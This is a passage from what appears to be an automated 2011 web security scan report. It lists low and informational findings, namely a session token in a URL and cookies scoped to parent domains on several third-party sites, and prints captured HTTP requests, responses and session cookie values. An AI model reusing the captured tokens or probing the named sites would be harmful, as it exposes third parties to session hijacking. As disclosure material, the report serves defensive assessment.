Referer: http://www.matrix42.com/downloads/wp-vdi-demystified/?gclid=CLGJxqyCo6sCFWYbQgodY3FG1w
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=721gl7390nj2pm26demj4h2ha7; fe_typo_user=8fd7138ee5b020a91ffe719a02122e94; __utma=207272207.97652317.1316237219.1316237219.1316237219.1; __utmb=207272207.1.10.1316237219; __utmc=207272207; __utmz=207272207.1316237219.1.1.utmgclid=CLGJxqyCo6sCFWYbQgodY3FG1w|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=virtual%20desktop

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:28:26 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 8636
Content-Type: text/html; charset=iso-8859-1

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.
...[SNIP]...

10.19. http://www.websitealive2.com/89/visitor/vTrackerSrc_v2.asp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.websitealive2.com
Path:   /89/visitor/vTrackerSrc_v2.asp

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /89/visitor/vTrackerSrc_v2.asp?action=poll&groupid=89&websiteid=0&departmentid=0&sessionid_=30306&grouponline=Y&online_acd=&dt=IT%20On%20Command&dl=http%3A%2F%2Fwww.itoncommand.com%2FGetAQuote.aspx%3Futm_source%3Dgoogle%26utm_medium%3Dcpc%26utm_term%3DVDI%26utm_campaign%3DCampaign%2520%231%26gclid%3DCNHDra6Co6sCFUkbQgodVnkZ4Q&rf=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dvirtual%2Bdesktop%23pq%3Dvdi%26hl%3Den%26sugexp%3Dgsis%252Ci18n%253Dtrue%26cp%3D7%26gs_id%3Dw%26xhr%3Dt%26q%3Dvdi%2Bhosting%26pf%3Dp%26sclient%3Dpsy-ab%26source%3Dhp%26pbx%3D1%26oq%3Dvdi%2Bhos%26aq%3D0%26aqi%3Dg1g-v3%26aql%3D%26gs_sm%3D%26gs_upl%3D%26bav%3Don.2%2Cor.r_gc.r_pw.%26fp%3Db659e1e8b520709%26biw%3D1087%26bih%3D870&wsa_custom_str=^^^^&random=0.6624209545552731 HTTP/1.1
Host: www.websitealive2.com
Proxy-Connection: keep-alive
Referer: http://www.itoncommand.com/GetAQuote.aspx?utm_source=google&utm_medium=cpc&utm_term=VDI&utm_campaign=Campaign%20
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsa=cookiedetect=True&proactiveauto%5Fenabled%5F0=N&lastwebsiteid=0&pagesvisited%5F0=1; ASPSESSIONIDSCQDABCS=CBNKONCBJEMLOJKGEAPJOAOJ

Response

HTTP/1.1 200 OK
Cache-Control: no-store, must-revalidate, private,private
Pragma: no-cache
Content-Length: 114
Content-Type: text/html
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NOI DSP COR CURa OUR NOR"
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 00:25:57 GMT


//alert('1');

//alert('browsing');

//alert('proactive_lastaccept=');
               

11. Cookie scoped to parent domain  previous  next
There are 199 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


11.1. http://www.mailjet.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.mailjet.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.mailjet.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: affiliate=US-EN-smtp; __utma=176514170.637056612.1316204845.1316204845.1316216714.2; __utmz=176514170.1316216714.2.2.utmgclid=CKqV0feJoqsCFQdzgwod6j2wjw|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=smtp%20server; mail_session=eBECc5P86kNJkdgPHXMP5I1eoqmuQK8Wth9SeN6SpTanNl%2BIMK3Vk3hh%2BKotjc6kCTPrDJoNurwRw6GM%2BTajfd68Q2JR1srviTEIJQdZlQKcAP%2FgpKerTQyg069KhGc%2BKH8Lqz7CvTFUOuDyUHLQaw3dO5sbOebp%2FdlS43mL0ixewGdzbbUf70Lthq8bT89vu1yA1IJJEHuJkgsvifrOiWlu0lqtQ1mxNLsnfDBqQUeWErQHGUIhtFZ4I6kszTHJVi9nKTtO%2BHEMndjaNyaeH5gOYLil%2FjP3614KUDFePqmcCo8AdA18wCf62qAqYrXYXou1GUUNCQ7Gu6p%2Bgj4NBZTyMiTWqj5vRjYS3u6FfuvOVot%2Frn4DCjf8eGKoOh9Wi%2FdKLTsMqkwMo7mOdNVUqZp96fwCysDLdMJd3jRKoJWcol9ssDrA8rxzNM1IiLEgBkghrkbu3Oe0HKA%2BiG6nvUHaAan6eTFbImXerdkZN6ERU8oyWiTyQh13H7cVFjBnnsG%2Fl%2BZ%2BxWFO5lhxSzjq9Re5pfoI5qbGq23okGTmc1tR0P%2FM09Uax2UAE6RZPDKyHK8Rb0qbhJXKkuqzQE7FfJcUEUIP%2Fvn2mGbPLoBoY5hAOZ1hkdAfeEWnK2F16247

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 21:54:37 GMT
Server: MJWS/1.0
Set-Cookie: mail_session=E7akOnzn%2FBA1l6z%2FaW%2BN1GdC75rQgbL5GSBkgpGxDQxWUXGAjBsnQl2ghC1weFjH97%2FX958Q8xLgMFEPkxx1TUmqwLlxTE52ADvd%2B4K7geFiEoVb1BRSEVx%2FEIdhtPbtqBiAF915vU5lG0o71aUPLVeOkZ0oga%2BQkGE%2BD6xqTJWX9ewXAop2Li%2FUKffRZZEsVmmduR0H0o7STsiY1r5ju8KSYlXV2pSpORxb1nMMduo0w6xfcmI9wXG8Dos%2FVBaFZgmae4BU1Q%2FMFK4il10d7cXGQdLR9bf2gzksL8BoehEaX2hQcFxCXS6i7TSPRwaB7VwqLhcdr6Jq2rtdBxIQEZ4xaZyGmZCMPvCmmZMpjc1uIFX0OPKISRYjNbDyvCGmf0Kp6R5R%2BlYF9U2zc64dZQXsHzDvz3vwHMTx%2BayPNzK5cwY81Mwc%2B0NP%2Bp57ZgC1aNaNdrA7V5hZSPVjWHAuDUY2K4yzLjHDw7hdhpSu3CutQIPGspzdQKm5jJySQnW50UzW5g%2FKWaEYlgQ4fXPZ%2BGll5shnlRV9dN9uOE8Szqht%2BQSqRkJ6W5fdFvxTVihLl6r1DNLD0RSTIFxcshasi6rvTWhrwZR159CrB11QuZFMwLwlUqJwPZAN%2FcRULvZ8; expires=Fri, 23-Sep-2011 21:54:37 GMT; path=/; domain=.mailjet.com
Content-Type: text/html; charset=utf-8
Content-Length: 12292

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
   <title>Mailjet : Real-time Emailing
...[SNIP]...

11.2. http://www.mailjet.com/pricing  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.mailjet.com
Path:   /pricing

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pricing HTTP/1.1
Host: www.mailjet.com
Proxy-Connection: keep-alive
Referer: http://www.mailjet.com/features
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: affiliate=US-EN-smtp; mail_session=170C5t%2BzRJJ5t%2FWv1ULaD7bK8ItpVy7iytSGyaHePyLTX3sJaU19v5y8r3EqdHTwSZqUba4mEDAu6RDO9Yume6Q36MZp83YIr9SG%2FlelT9kxkMl79h2fHQh0O99uPuUyb0tsP0Am4hqjnlwkjdwf3bKJEh5B4ef6HZGtsFVnueph1WcP2gdunPQaT9H2VRZjw2pSGuUM6ZZDJhb1sxZ5OXehfHhdgKf66xZbmq4SMsKU%2FAtkCbqGWzWB852Yjqf4WEj%2BRsv69x9nkcCHxWvHd1TVykmWxj2ueoG6%2F8GzE45ZTkb8dsc9YMpK5gpeXkmX6S02L0Ej7oGv847c92MA54RQPQDrWdNNKWh0o0dYCYrNIh56EJz8ptb%2F0P4py9guha4Joj1q%2F05fAK4M1gcl3VB8FHX1awSWpfQfK7JrK5%2FA0qyaJ0ss4jP3CQaDDo%2BFSKPSdP4Qa05YuQh2Wz%2BA6O4Gcqc2kFssi3b8JHpsBkWyN0pVa3MtlhaDtzLZQIUrsUYXs6zSxXwoPEbQ7UlMzMvBZJTAR39lBjutvOvY810HOw98wbRhbDR%2BqD8FSjECOcFI3dwqrLkbnurRGcgvV5DQWTaP9PiIbUAdzzNx1Tg5yjruOvau6y4p7H5u9Zj7; __utma=176514170.637056612.1316204845.1316216714.1316228159.3; __utmb=176514170.2.10.1316228159; __utmc=176514170; __utmz=176514170.1316228159.3.3.utmgclid=CKqV0feJoqsCFQdzgwod6j2wjw|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=smtp%20server

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 21:54:53 GMT
Server: MJWS/1.0
Set-Cookie: mail_session=ue8DwvgMWj3limxfE4emkc%2Bezm%2B9mVnU%2FVoqCwNRZiiMnbi9ugqDp6%2FHctqrJKdkVhhzWLhZIYqvV8VtE5HormQSeGnd4V7fV0vXi1RwUgvmfAKIz4GwwMjQ84mEQzp0JsUa96%2Fl2PR9k5%2BOk6WT3hefeiCrKnbfqoHUQb9ygs0sjfnn4mVuYVXwDg3%2B8LrQC5swXDqzquzXXFp9NM1LSA1qen45s1F2PprXAmVxULCj%2FqTlKHWUxK%2FCujHVLgIX3QaHWvBpH5y7UxTxintKiXaCW3xJzPaP9EzmPSvzjfEflPWhyC2VyUmV11fXShRG7FK25Ur4HmeQYJdJUzWHzG3OzBRBuuLy7%2FsgsLz73rneCrTBtaE0j4Izx5POpBgHKaQvzv6rrmpn7fImRObB0ieRTw8KoAN7iaU4ZWYi4QXrdvEibUV1xax0xS%2FSa1ToPtH41IbEET25cAW8VjLsXyxdr6gwo4PladoWYA3j4Dj4E9NiCUrXLHfNogcpi5jN94yClibewZHh3k%2Fa5cJaUdr1JxAsD2L2D%2FzW1R%2FKnlS%2FTgwVa%2BW4EefBnKq%2BobeDWBOnGcmwjjWy647PhbabVd4z6jG3QS2E1ysRk5ajn1%2FCHhV01AEpshLxUtBRpcHL; expires=Fri, 23-Sep-2011 21:54:54 GMT; path=/; domain=.mailjet.com
Content-Type: text/html; charset=utf-8
Content-Length: 20125

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
   <title>Pricing plans - mailjet.com</
...[SNIP]...

11.3. https://www.mailjet.com/signup  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.mailjet.com
Path:   /signup

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /signup HTTP/1.1
Host: www.mailjet.com
Connection: keep-alive
Referer: http://www.mailjet.com/pricing
Content-Length: 10
Cache-Control: max-age=0
Origin: http://www.mailjet.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: affiliate=US-EN-smtp; mail_session=ue8DwvgMWj3limxfE4emkc%2Bezm%2B9mVnU%2FVoqCwNRZihPBS2aHbLPcJsh6zMrtsk5VBdWC2Q4%2FkY28R9i6SSa8dGAVUF8%2FPHumHv5F7VKYeMBcuJ3ocAQC8%2F1zpjTEa2eAIF2%2Fd1MaVsJjlYd%2BEvlsPy4Bruem8u21CL9yz8Ap%2Bo%2BCyjRIR52HCoEp7Gk2hMyvFZOK%2Fjx%2BGyh7%2Fsu8NFSZJ6LqVEMBAyL0NbwqKufi7iGB%2Fv%2F9tP9%2BJn57nRT7jf0OSu%2BSPaMMJ8CfmvGgjKuJr3Z3pjiI0Og8n2P%2BMDPxM5rZyhpW1H5bV6WiztfbkT5g%2BTxq5Sr9hjD093jyLRosfaux9DQuY9RcGBtBWydBnI%2FakIBZf1Gn%2FuhZ530ibuwBdDE3AAckB%2BX%2BQrsXYlox4bwiU%2BKUBCyOImviEfwVersfFPKJQTWs9BG6BLGawt5EAPShjQ3ZpGsRqD6D4DgBt8uEV0jSSUO5Nj9HsCmW6vnbM9Bc%2BhVI8FqYz2j4YkPtqWtgVhuS41Vo00JKJGreh2otpfEl3yl5R6F7KRY3%2BGclQqwvpHsWkNErB2NRzbFk4I3S%2FINHLVFnH2fvlkerYTMa%2B6iqgaqFGiaNLmKiqxdhh5hbqRCvPphR8CMT7hL; __utma=176514170.637056612.1316204845.1316216714.1316228159.3; __utmb=176514170.3.10.1316228159; __utmc=176514170; __utmz=176514170.1316228159.3.3.utmgclid=CKqV0feJoqsCFQdzgwod6j2wjw|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=smtp%20server

plan_id=38

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 21:55:01 GMT
Server: MJWS/1.0
Set-Cookie: mail_session=iQluRDaaB5M5AYtNJtKxLETKPFlyZG2Bb7aOz31g0XcJh051qecDn7WucsCQ5sPWMgov3crx%2Fe%2FVKHsfCKjgl0ts693dBbaw%2Bn8Z%2FZBRorc9S8yidBGGXRaEhLryAJRKXu8%2BmD5MfSSdUTArbPeuXqQTjl2%2Bz9Sps1DERl3gEQpRfzJHQU4%2FwSwXV%2FxG%2F%2B%2FxrLfIRvU4YGR9sNKRhV7Tp8y6xVR%2F406%2FF0NJNO84XVNcH7wVgIoZ%2BDtc6ZqtqYfZNbZ%2Ffsn12Ti6F3wqJfDXrfqEvwXlxxkIL3LWxFPMBsj6GRMSN5Beq9y%2BPikxBZWSpq8SNFZCwRQuOf2iioO708BZnv4AmSVUO2TA2qNfgYDSH75LdyKerW%2BnqWtmWbNib2Ke0irqnRb2LZXI7vbN%2FqlLnObWTqNDuveaarqUwcND3a%2FSRhy9MB5hAXw5SRtmg69SfaKU5IXFco%2F3%2B7CnWJ%2F%2F7VWiEY9c4oqHIUD7f6HMgacyF5JKG%2BefqhRdjC8skgLWP1T%2F07KLzZIrP0dZRJgsTMBLpI%2FYkzvF6CxdxpufVXy5MYalpKk2AIm85yqTw1398l%2Fx3tDNeDOW8EJ4D6%2Fj86oVOWSL2aNXti%2FfnM7wXf2BD9wgdi6H8bNR5Xbf; expires=Fri, 23-Sep-2011 21:55:01 GMT; path=/; domain=.mailjet.com
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 9167

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
   <title>Sign up for a free - mailjet.
...[SNIP]...

11.4. http://27.xg4ken.com/media/redir.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://27.xg4ken.com
Path:   /media/redir.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /media/redir.php?prof=2251&camp=34930&affcode=kw2705&inhURL=&cid=7925869215&networkType=search&utm_source=google&utm_medium=cpc&utm_term=VDI&utm_campaign=Campaign+%231&url[]=http%3A%2F%2Fwww.itoncommand.com%2FGetAQuote.aspx&gclid=CNHDra6Co6sCFUkbQgodVnkZ4Q HTTP/1.1
Host: 27.xg4ken.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=virtual+desktop#pq=vdi&hl=en&sugexp=gsis%2Ci18n%3Dtrue&cp=7&gs_id=w&xhr=t&q=vdi+hosting&pf=p&sclient=psy-ab&source=hp&pbx=1&oq=vdi+hos&aq=0&aqi=g1g-v3&aql=&gs_sm=&gs_upl=&bav=on.2,or.r_gc.r_pw.&fp=b659e1e8b520709&biw=1087&bih=870
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kenshoo_id=200d2a28-23e9-a048-8372-00005235d564

Response

HTTP/1.1 302 Found
Date: Sat, 17 Sep 2011 00:25:32 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Set-Cookie: kenshoo_id=200d2a28-23e9-a048-8372-00005235d564; expires=Fri, 16-Dec-2011 00:25:32 GMT; path=/; domain=.xg4ken.com
Location: http://www.itoncommand.com/GetAQuote.aspx?utm_source=google&utm_medium=cpc&utm_term=VDI&utm_campaign=Campaign #1&gclid=CNHDra6Co6sCFUkbQgodVnkZ4Q
P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


11.5. http://2912a.v.fwmrm.net/ad/l/1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://2912a.v.fwmrm.net
Path:   /ad/l/1

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ad/l/1?last=1&ct=0&metr=0&s=b035&t=1316221067347346&adid=661886&reid=352172&arid=0&auid=&cn=defaultImpression&et=i&_cc=661886,352172,,12523.,1316221067,1&tpos=&init=1&cr=http%3A//ad.doubleclick.net/ad/N6357.abc.go.comOX2203/B5805994.7%3Bsz%3D1x1%3Bpc%3D%5BTPAS_ID%5D%3Bord%3D%5Btimestamp%5D%3F HTTP/1.1
Host: 2912a.v.fwmrm.net
Proxy-Connection: keep-alive
Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_twmbewjq3.gxnsn.ofu=ffffffff09097e5045525d5f4f58455e445a4a423208; _sid="b035_5653126437071259822"; _uid="b035_5653126437071259818"; _vr="1316221067.58849.661884~661886~,"; _cph="1316221067.1103.1.1,"; _sc="sg193954.1316221067.1316221068.28800.0.0,"; _wr="g193954"

Response

HTTP/1.1 302 Found
Set-Cookie: _uid="b133_5653128344036830895";expires=Sun, 16 Sep 2012 01:05:12 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _auv="g193954~1.1316221511.0,5.1316221512.0,21966.1316221511.0,21967.1316221512.0,^";expires=Mon, 17 Oct 2011 01:05:12 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _sc="sg193954.1316221067.1316221512.28800.0.0,";expires=Mon, 17 Oct 2011 01:05:12 GMT;domain=.fwmrm.net;path=/;
Location: http://ad.doubleclick.net/ad/N6357.abc.go.comOX2203/B5805994.7;sz=1x1;pc=[TPAS_ID];ord=[timestamp]?
Content-Length: 0
Date: Sat, 17 Sep 2011 01:05:12 GMT
Server: FWS
P3P: policyref="http://www.freewheel.tv/w3c/p3p.xml",CP="ALL DSP COR NID"


11.6. http://2912a.v.fwmrm.net/ad/l/1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://2912a.v.fwmrm.net
Path:   /ad/l/1

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ad/l/1?last=0&ct=0&metr=127&s=b035&t=1316221067347346&adid=661884&reid=352153&arid=0&auid=&cn=defaultImpression&et=i&_cc=661884,352153,,12523.,1316221067,1&tpos=0&iw=&uxnw=&uxss=&uxct=&init=1&cr=http%3A//trk.vindicosuite.com/Tracking/V3/Instream/Impression/%3F0-496-65399-58070-8127-22419-undefined-10-3017-14-BBEEND-%26iari%3D116206%26cb%3D634515457010002879%26internalRedirect%3Dtrue%26 HTTP/1.1
Host: 2912a.v.fwmrm.net
Proxy-Connection: keep-alive
Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_twmbewjq3.gxnsn.ofu=ffffffff09097e5045525d5f4f58455e445a4a423208; _sid="b035_5653126437071259822"; _uid="b035_5653126437071259818"; _vr="1316221067.58849.661884~661886~,"; _cph="1316221067.1103.1.1,"; _sc="sg193954.1316221067.1316221068.28800.0.0,"; _wr="g193954"

Response

HTTP/1.1 302 Found
Set-Cookie: _auv="g193954~1.1316221508.0,5.1316221071.0,21966.1316221508.0,21967.1316221071.0,^";expires=Mon, 17 Oct 2011 01:05:08 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _vr="1316221508.58849.661884~661886~,";expires=Mon, 17 Oct 2011 01:05:08 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _cph="1316221507.1103.1.1,";expires=Mon, 17 Oct 2011 01:05:08 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _sc="sg193954.1316221067.1316221508.28800.0.0,";expires=Mon, 17 Oct 2011 01:05:08 GMT;domain=.fwmrm.net;path=/;
Location: http://trk.vindicosuite.com/Tracking/V3/Instream/Impression/?0-496-65399-58070-8127-22419-undefined-10-3017-14-BBEEND-&iari=116206&cb=634515457010002879&internalRedirect=true&
Content-Length: 0
Date: Sat, 17 Sep 2011 01:05:08 GMT
Server: FWS
P3P: policyref="http://www.freewheel.tv/w3c/p3p.xml",CP="ALL DSP COR NID"


11.7. http://2912a.v.fwmrm.net/ad/l/1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://2912a.v.fwmrm.net
Path:   /ad/l/1

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ad/l/1?s=b035&t=1316221067347346&cn=slotImpression&et=i&tpos=0&init=1&slid=0 HTTP/1.1
Host: 2912a.v.fwmrm.net
Proxy-Connection: keep-alive
Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_twmbewjq3.gxnsn.ofu=ffffffff09097e5045525d5f4f58455e445a4a423208; _sid="b035_5653126437071259822"; _uid="b035_5653126437071259818"; _vr="1316221067.58849.661884~661886~,"; _cph="1316221067.1103.1.1,"; _sc="sg193954.1316221067.1316221067.28800.0.0,"; _wr="g193954"

Response

HTTP/1.1 200 OK
Set-Cookie: _uid="b035_5653126437071259818";expires=Sun, 16 Sep 2012 01:04:50 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _vr="1316221490.58849.661884~661886~,";expires=Mon, 17 Oct 2011 01:04:50 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _cph="1316221489.1103.1.1,";expires=Mon, 17 Oct 2011 01:04:50 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _sc="sg193954.1316221067.1316221490.28800.0.0,";expires=Mon, 17 Oct 2011 01:04:50 GMT;domain=.fwmrm.net;path=/;
Content-Type: text/html
Content-Length: 0
Pragma: no-cache
Date: Sat, 17 Sep 2011 01:04:50 GMT
Server: FWS
P3P: policyref="http://www.freewheel.tv/w3c/p3p.xml",CP="ALL DSP COR NID"


11.8. http://2912a.v.fwmrm.net/ad/p/1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://2912a.v.fwmrm.net
Path:   /ad/p/1

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /ad/p/1? HTTP/1.1
Host: 2912a.v.fwmrm.net
Proxy-Connection: keep-alive
Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0
Content-Length: 1435
Origin: http://beta.abc.go.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
content-type: text/xml
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_twmbewjq3.gxnsn.ofu=ffffffff09097e5045525d5f4f58455e445a4a423208

<adRequest networkId="168234" profile="168234:ABC_Live" version="1"><capabilities><supportsSlotTemplate /><explicitVideoTracking /><expectMultipleCreativeRenditions /><supportsAdUnitInMultipleSlots />
...[SNIP]...

Response

HTTP/1.1 200 OK
Set-Cookie: _uid="b035_5653126437071259818";expires=Sun, 16 Sep 2012 01:04:46 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _vr="1316221486.58849.661884~661886~,";expires=Mon, 17 Oct 2011 01:04:46 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _cph="1316221486.1103.1.1,";expires=Mon, 17 Oct 2011 01:04:46 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _sc="sg193954.1316221067.1316221486.28800.0.0,";expires=Mon, 17 Oct 2011 01:04:46 GMT;domain=.fwmrm.net;path=/;
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Max-Age: 1728000
Access-Control-Allow-Headers: content-type, depth, user-agent, x-file-size, x-requested-with, if-modified-since, x-file-name, cache-control
X-FW-Power-By: Smart
Content-Type: text/xml
Content-Length: 9973
Pragma: no-cache
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 01:04:45 GMT
Server: FWS
P3P: policyref="http://www.freewheel.tv/w3c/p3p.xml",CP="ALL DSP COR NID"

<adResponse version='1'><rendererManifest version='1'>&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;
&lt;adRenderers version=&apos;1&apos;&gt;&lt;adRenderer adUnit=&apos;video,&apos;
...[SNIP]...

